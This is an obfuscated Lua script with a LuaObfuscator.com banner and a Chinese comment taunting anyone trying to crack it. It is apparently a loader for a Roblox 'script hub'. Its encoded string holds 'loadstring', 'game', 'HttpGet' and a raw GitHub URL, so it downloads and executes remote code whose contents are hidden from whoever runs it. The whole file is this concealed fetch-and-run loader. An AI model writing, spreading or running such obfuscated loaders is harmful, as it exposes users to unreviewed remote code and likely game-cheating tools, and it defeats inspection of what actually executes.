--看你妈源代码,儿子好好破解
--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16,...)local v17=1;local v18;v15=v4(v3(v15,5),"..",function(v29)if (v1(v29,2)==79) then v18=v0(v3(v29,1,1));return "";else local v63=0;local v64;while true do if (v63==0) then v64=v2(v0(v29,16));if v18 then local v77=0;local v78;while true do if (v77==0) then v78=v5(v64,v18);v18=nil;v77=1;end if (v77==1) then return v78;end end else return v64;end break;end end end end);local function v19(v30,v31,v32)if v32 then local v65=0 -0;local v66;while true do if (v65==(0 + 0)) then v66=(v30/((9 -7)^(v31-1)))%((3 -1)^(((v32-((1 + 1) -1)) -(v31-1)) + (179 -(114 + 64))));return v66-(v66%((1363 -(319 + 1041)) -2));end end else local v67=(1636 -(876 + 758))^(v31-(567 -(208 + 358)));return (((v30%(v67 + v67))>=v67) and (1 + 0)) or (0 -0);end end local function v20()local v37=0 -0;local v38;while true do if (v37==(0 -0)) then v38=v1(v15,v17,v17);v17=v17 + 1;v37=1 + 0 + 0;end if (v37==(1897 -(161 + (2555 -(768 + 52))))) then return v38;end end end local function v21()local v39=1552 -(1386 + 166);local v40;local v41;while true do if ((1645 -((2489 -(580 + 640)) + 376))==v39) then v40,v41=v1(v15,v17,v17 + (169 -(139 + 28)));v17=v17 + 1 + 1 + 0;v39=1 + 0;end if (v39==(991 -(195 + 795))) then return (v41 * 256) + v40;end end end local function v22()local v42,v43,v44,v45=v1(v15,v17,v17 + 3);v17=v17 + (7 -3);return (v45 * (23653881 -6876665)) + (v44 * 65536) + (v43 * (1387 -(418 + 713))) + v42;end local function v23()local v46=v22();local v47=v22();return (( -(4 -2) * v19(v47,32)) + 1) * ((2 + (1141 -(789 + 352)))^(v19(v47,(22 -7) + 6,1226 -(409 + 786)) -(1423 -(82 + 318)))) * ((((v19(v47,1 + 0,8 + 12) * ((1568 -(355 + 1211))^(132 -100))) + v46)/((1 + 1)^(21 + 31))) + (2 -(2 -1)));end local function v24(v33)local v48=(2556 -(140 + 1622)) -(409 + 385);local v49;local v50;while true do if (v48==((166 -(157 + 6)) -2)) then v49=v3(v15,v17,(v17 + v33) -(1 + 0));v17=v17 + v33;v48=2;end if (v48==(7 -5)) then v50={};for v74=3 -2, #v49 do v50[v74]=v2(v1(v3(v49,v74,v74)));end v48=3;end if (v48==((0 -0) + 0)) then v49=nil;if  not v33 then v33=v22();if (v33==((1170 + 482) -(927 + 725))) then return "";end end v48=1 + 0;end if (v48==(5 -2)) then return v6(v50);end end end local v25=v22;local function v26(...)return {...},v11("#",...);end local function v27()local v51=0 + 0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51~=(4 + 0)) then else while true do if (v52~=(1295 -(940 + 354))) then else v55=nil;v56=nil;v52=2;end if ((530 -(161 + 367))==v52) then v57=nil;v58=nil;v52=5 -2;end if (v52~=(0 + 0)) then else local v76=0 + 0;while true do if ((1608 -(1373 + 235))==v76) then local v96=0 -0;while true do if (v96==(686 -(492 + 194))) then v53=0 -0;v54=nil;v96=3 -2;end if (v96==(1 -0)) then v76=861 -(614 + 246);break;end end end if (v76~=1) then else v52=1;break;end end end if (v52~=3) then else v59=nil;while true do local v79=0 -0;local v80;while true do if (v79~=(0 -0)) then else v80=181 -(76 + 105);while true do if (v80~=(714 -(200 + 513))) then else if (v53==(3 -2)) then local v102=0 + 0;local v103;while true do if (v102~=(0 -0)) then else v103=0 + 0;while true do if (v103==(1 + 0)) then v59={};v53=2;break;end if (v103~=(0 + 0)) then else v57={v54,v55,nil,v56};v58=v22();v103=967 -(580 + 386);end end break;end end end if (v53~=(0 + 0)) then else local v104=0;local v105;local v106;while true do if (0==v104) then v105=0;v106=nil;v104=1917 -(1768 + 148);end if (v104==(719 -(572 + 146))) then while true do if (v105==(1307 -(874 + 433))) then v106=1226 -(941 + 285);while true do if (v106==1) then v56={};v53=1 + 0;break;end if (v106==(1636 -(1023 + 613))) then local v136=0;while true do if (v136~=(0 + 0)) then else v54={};v55={};v136=1 -0;end if (v136==(4 -3)) then v106=1;break;end end end end break;end end break;end end end break;end if (v80==(0 -0)) then local v101=0 -0;while true do if (v101==(0 -0)) then if (v53~=(47 -(38 + 6))) then else local v108=0;local v109;local v110;while true do if (v108==(28 -(12 + 15))) then while true do if (v109==(0 -0)) then v110=0 -0;while true do if (v110~=(0 + 0)) then else local v148=1300 -(990 + 310);while true do if ((0 + 0)==v148) then for v159=2 -1,v22() do v55[v159-1]=v27();end for v161=1980 -(990 + 989),v22() do v56[v161]=v22();end v148=1;end if (v148==(1673 -(543 + 1129))) then v110=1;break;end end end if (v110==(1 + 0)) then return v57;end end break;end end break;end if ((0 + 0)==v108) then v109=0 + 0;v110=nil;v108=1 + 0;end end end if (v53==(278 -(138 + 138))) then local v111=0;while true do if (v111==1) then for v117=1 + 0,v22() do local v118=0;local v119;local v120;while true do if (v118==(2 -1)) then while true do if (v119==(0 -0)) then v120=v20();if (v19(v120,1 -0,1 + 0)==0) then local v151=0;local v152;local v153;local v154;local v155;local v156;while true do if (v151==(2 -1)) then v154=nil;v155=nil;v151=2;end if (v151~=(521 -(94 + 425))) then else v156=nil;while true do if (v152~=(1991 -(26 + 1965))) then else local v171=0;while true do if (v171~=(53 -(40 + 13))) then else v153=0 -0;v154=nil;v171=1;end if (v171==(2 -1)) then v152=807 -(243 + 563);break;end end end if (v152==1) then local v172=0 + 0;local v173;while true do if (v172~=(0 -0)) then else v173=852 -(822 + 30);while true do if ((0 -0)~=v173) then else local v183=0 -0;while true do if (v183==0) then v155=nil;v156=nil;v183=1 + 0;end if (v183==(3 -2)) then v173=1;break;end end end if (v173~=(2 -1)) then else v152=2;break;end end break;end end end if (v152~=(2 + 0)) then else while true do if (v153==(0 -0)) then local v174=0 -0;while true do if (v174~=0) then else local v184=0;while true do if (v184~=(882 -(49 + 832))) then else v174=1 + 0;break;end if (v184==(0 -0)) then v154=v19(v120,2 + 0,1350 -(358 + 989));v155=v19(v120,4 + 0,1427 -(1061 + 360));v184=1 + 0;end end end if (v174~=(600 -(23 + 576))) then else v153=407 -(101 + 305);break;end end end if (v153==(2 + 0)) then local v175=0;local v176;local v177;while true do if (v175==(0 -0)) then v176=0 + 0;v177=nil;v175=1;end if (v175==1) then while true do if (v176==0) then v177=0 + 0;while true do if (v177~=1) then else v153=3;break;end if (v177==0) then if (v19(v155,1 -0,1)~=(1190 -(473 + 716))) then else v156[2]=v59[v156[1589 -(532 + 1055)]];end if (v19(v155,4 -2,2)==1) then v156[3]=v59[v156[3 -0]];end v177=1 + 0;end end break;end end break;end end end if (v153~=(1 + 2)) then else if (v19(v155,3,3)~=1) then else v156[10 -6]=v59[v156[1129 -(848 + 277)]];end v54[v117]=v156;break;end if ((1 + 0)==v153) then local v179=0 -0;local v180;while true do if (v179~=(0 + 0)) then else v180=0 -0;while true do if (v180==(0 -0)) then local v185=0 -0;while true do if ((2 -1)==v185) then v180=1;break;end if (v185==(0 + 0)) then v156={v21(),v21(),nil,nil};if (v154==(0 + 0)) then local v190=1909 -(119 + 1790);local v191;local v192;while true do if (v190==(1135 -(341 + 793))) then while true do if (v191==(938 -(317 + 621))) then v192=0 -0;while true do if (v192~=(0 -0)) then else v156[965 -(317 + 645)]=v21();v156[2 + 2]=v21();break;end end break;end end break;end if (v190~=0) then else v191=0 + 0;v192=nil;v190=1 + 0;end end elseif (v154==1) then v156[3 + 0]=v22();elseif (v154==(989 -(635 + 352))) then v156[1347 -(1223 + 121)]=v22() -(2^16);elseif (v154==(2 + 1)) then local v195=829 -(615 + 214);local v196;while true do if (v195==0) then v196=0;while true do if (v196==(696 -(143 + 553))) then v156[1 + 2]=v22() -((3 -1)^(204 -(15 + 173)));v156[8 -4]=v21();break;end end break;end end end v185=1632 -(1343 + 288);end end end if (v180~=1) then else v153=1 + 1;break;end end break;end end end end break;end end break;end if (v151==(0 + 0)) then v152=0 -0;v153=nil;v151=1;end end end break;end end break;end if ((0 + 0)~=v118) then else v119=624 -(66 + 558);v120=nil;v118=570 -(142 + 427);end end end v53=3;break;end if ((0 + 0)~=v111) then else local v114=0 + 0;while true do if (v114~=0) then else for v138=1,v58 do local v139=0 -0;local v140;local v141;local v142;while true do if (v139==0) then v140=0 -0;v141=nil;v139=616 -(488 + 127);end if (v139==(1919 -(1387 + 531))) then v142=nil;while true do if (v140==(1874 -(729 + 1144))) then if (v141==1) then v142=v20()~=(1134 -(725 + 409));elseif (v141==(282 -(44 + 236))) then v142=v23();elseif (v141~=(2 + 1)) then else v142=v24();end v59[v138]=v142;break;end if (v140~=(803 -(358 + 445))) then else local v164=918 -(862 + 56);while true do if (v164~=(1 + 0)) then else v140=1;break;end if (v164==(0 -0)) then local v170=0 -0;while true do if (v170~=1) then else v164=1 + 0;break;end if (v170~=0) then else v141=v20();v142=nil;v170=320 -(290 + 29);end end end end end end break;end end end v57[8 -5]=v20();v114=1;end if (v114==(3 -2)) then v111=1123 -(553 + 569);break;end end end end end v101=2 -1;end if (v101==(1 + 0)) then v80=1 + 0;break;end end end end break;end end end break;end end break;end if (v51==(4 -1)) then v58=nil;v59=nil;v51=4;end if ((1954 -(1577 + 377))==v51) then v52=0;v53=nil;v51=1;end if (v51==(1785 -(76 + 1707))) then v56=nil;v57=nil;v51=809 -(37 + 769);end if (1==v51) then v54=nil;v55=nil;v51=1 + 1;end end end local function v28(v34,v35,v36)local v60=v34[1];local v61=v34[2];local v62=v34[3];return function(...)local v68=0;local v69;local v70;local v71;local v72;local v73;while true do if (v68==3) then A,B=v26(v10(v73));if  not A[1] then local v81=v34[4][v69] or "?";error("Script error at ["   .. v81   .. "]:"   .. A[2]);else return v12(A,2,B);end break;end if (v68==1) then v71={...};v72=v11("#",...) -1;v68=2;end if (v68==0) then v69=1;v70= -1;v68=1;end if (v68==2) then v73=nil;v73=function()local v82=v60;local v83=v61;local v84=v62;local v85=v26;local v86={};local v87={};local v88={};for v92=0,v72 do if (((2499 -(194 + 295))<(6262 -(58 + 1849))) and (v92>=v84)) then v86[v92-v84]=v71[v92 + (1 -0)];else v88[v92]=v71[v92 + (3 -2)];end end local v89=(v72-v84) + (610 -((656 -(185 + 256)) + 394));local v90;local v91;while true do local v93=0;local v94;local v95;while true do if (((2655 -(574 + 493))>37) and (v93==1)) then while true do if (((4008 -737)<(5453 -(326 + 718 + 946))) and (v94==0)) then v95=0 -0;while true do if ((v95==0) or ((19742 -15709)<(3296 -966))) then local v107=0;while true do if (((3189 -(540 + 409))>=(5267 -3098)) and (v107==(0 -0))) then v90=v82[v69];v91=v90[(1 + 0) -0];v107=1 + 0;end if (((2643 -((31 -13) + 320))==(1216 + 1089)) and (v107==(1 + 0 + 0))) then v95=423 -(305 + (247 -130));break;end end end if (((6729 -(1625 + (353 -231)))>(516 -367)) and ((1 + 0)==v95)) then if (((1002 -704)<(3068 -(1806 + 62))) and (v91<=(2 + 0))) then if ((3909<=(5604 -(178 + 456))) and (v91<=(0 -0))) then v88[v90[(1108 -(1038 + 64)) -4]]=v90[305 -(10 + 292)];elseif ((((7436 -3399) -2132)>=(512 -298)) and (v91==(1 + 0))) then local v121=0 -0;local v122;local v123;local v124;local v125;local v126;while true do if ((v121==1) or (1057>=(102 + 4018))) then v124=nil;v125=nil;v121=1 + (3 -2);end if ((v121==(7 -5)) or ((5911 -4121)>=((15439 -7456) -5860))) then v126=nil;while true do if ((v122==(1 -0)) or ((6954 -3208)<=(3555 -(136 + 65)))) then local v149=0 + 0;while true do if (((2772 + 1171)>=(7682 -3982)) and (v149==(49 -(18 + 31)))) then v70=(v125 + v123) -(1268 -(1215 + 7 + 45));v126=0;v149=(19 -(6 + 12)) + 0;end if ((((6835 -(505 + 1080)) -1507)>=(363 + 539)) and (v149==1)) then v122=1 + 1;break;end end end if ((v122==(0 -0)) or ((5385 -(343 + 237))<=(2374 + 1790))) then local v150=0 -0;while true do if ((v150==(2 -1)) or ((1999 + 402)<(2771 -((2363 -(532 + 1411)) + 937)))) then v122=1 + 0;break;end if ((2027>=546) and (v150==(0 -0))) then v123=v90[113 -(77 + 34)];v124,v125=v85(v88[v123](v12(v88,v123 + (1575 -(570 + 1004)),v90[895 -(45 + (1668 -(442 + 379)))])));v150=1 + 0;end end end if ((v122==(2 + 0)) or ((11609 -7493)<=(5184 -2321))) then for v157=v123,v70 do local v158=0;while true do if ((v158==(0 + 0)) or (3392<((3479 -(1467 + 119)) -(54 + 131)))) then v126=v126 + (1 -0);v88[v157]=v124[v126];break;end end end break;end end break;end if ((1030<=(477 + 4205)) and (v121==(757 -(456 + 301)))) then v122=0;v123=nil;v121=1 + 0;end end else v88[v90[2 -0]]();end elseif (((5265 -(90 + 263))>4484) and (v91<=(4 -0))) then if (((3899 + 68)>2349) and (v91>(647 -(378 + 266)))) then do return;end else local v127=1333 -((1966 -695) + (134 -72));local v128;local v129;while true do if ((3614>=(4234 -2700)) and (v127==((3236 -1911) -(1120 + 205)))) then v128=v90[2];v129=v88[v90[1232 -((2761 -(212 + 1556)) + 236)]];v127=1652 -(1613 + 38);end if (((482 + 2549)<=(4018 -823)) and ((1 + 0)==v127)) then v88[v128 + 1]=v129;v88[v128]=v129[v90[4 + 0]];break;end end end elseif (((5872 -1879)==(3446 + 547)) and (v91>5)) then v88[v90[1312 -(861 + 449)]]=v36[v90[3 + 0]];else local v132=1042 -(207 + (2200 -(177 + 1188)));local v133;local v134;local v135;while true do if (((14071 -9200)>284) and ((0 + 0)==v132)) then v133=0 -0;v134=nil;v132=1 + 0;end if ((((5830 -3819) -(447 + 1519))<((1028 -575) -(90 + 200))) and (v132==(1 + 0))) then v135=nil;while true do if ((3080>(750 -(487 + 207))) and (v133==(0 -0))) then v134=0 -0;v135=nil;v133=1 + 0;end if ((2260>(1466 + 61)) and (v133==(1550 -(583 + 966)))) then while true do if (((0 + 0 + (0 -0))==v134) or ((578 -305)==(8708 -6316))) then v135=v90[1469 -(990 + 477)];v88[v135]=v88[v135](v12(v88,v135 + 1 + 0,v70));break;end end break;end end break;end end end v69=v69 + 1;break;end end break;end end break;end if ((v93==(0 -0)) or (23>=(4966 -2131))) then v94=0 -0;v95=nil;v93=2 -1;end end end end;v68=3;end end end;end return v28(v27(),{},v16)(...);end v14("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403583O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F726F626C6F786261642O31343531342F726F626C6F786261642O31343531342F6D61696E2F536125323073637269707425323068756200083O0012063O00013O001206000100023O00200300010001000300122O000300044O0001000100034O00055O00022O00023O000100012O00043O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v8(),...);end
